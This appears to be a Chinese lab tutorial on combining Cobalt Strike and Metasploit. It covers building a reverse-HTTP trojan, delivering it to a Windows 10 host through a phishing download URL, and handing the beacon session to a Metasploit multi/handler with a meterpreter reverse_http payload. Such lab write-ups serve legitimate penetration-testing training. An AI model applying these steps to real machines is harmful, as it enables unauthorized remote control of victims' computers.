网站做支付链接安全吗,app下载app开发公司,石材外贸网站,wordpress 移动插件一、测试环境
操作系统#xff1a; 1.VMware17 2.kali 6.1.0-kali5-amd64 3.Win10x64
软件#xff1a; 1.cs4.0 2.metasploit v6.3.4-dev
二、测试思路
1.cs是一款渗透测试工具#xff0c;但没有漏洞利用的模块#xff0c;我们可以在拿到目标主机的权限后#xff0c;将…一、测试环境
操作系统 1.VMware17 2.kali 6.1.0-kali5-amd64 3.Win10x64
软件 1.cs4.0 2.metasploit v6.3.4-dev
二、测试思路
1.cs是一款渗透测试工具但没有漏洞利用的模块我们可以在拿到目标主机的权限后将权限转移给msf再进行漏洞利用。
三、测试流程
1.启动cs
这两步需要在不同终端进行
本机地址和你设置的密码 打开cs 这里主机名为自己的地址密码为刚才设定的密码其他默认 看到此页面就下载成功 2.渗透目的主机
1.设置监听器
点击耳机 配置监听器beacon http反向连接两个http主机都填写本地ip地址选择一个不冲突的端口号点击保存。 2.生成木马
选择边栏上的攻击我们攻击Win10选择此类型木马。 选择我们刚刚创建的监听器并使用x64的payload点击生成建议保存到tmp中 为了将木马注入对方主机我们使用钓鱼url下载 选择我们刚才生成的木马注意一些电脑可能运行不了ext格式的文件我们需要将url中的ext改为exe根据自己需求决定file.ext就是目标主机下载的木马程序。点击开始 会生成一个钓鱼URL 3.在目标主机访问此URL
输入后自动下载木马程序前提关闭系统防火墙和杀毒软件 运行此木马程序后我们可以在cs上发现此主机已经上线 右键上线的主机进入beacon会话输入sleep 0使主机直接回复 测试是否成功 3.将cs的权限传递给msf
1.在cs新建一个监听器
记住名字使用Foreign外部http输入本机ip地址及一个不冲突的端口点击保存。 2.msf连接cs
使用msf中这此模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 本地ip
set lport 刚才新建cs监听器的端口号 输入run或者exploit开始运行
会出现这样一句话 返回cs右键目标主机选择增添对话选择我们新创建的监听器msf点击choose 回到msf我们会发现权限传递成功
出现此界面就代表传递成功若不成功就反复增添会话和msf运行这两个步骤。 测试是否能使用此权限
乱码为msf版本编码问题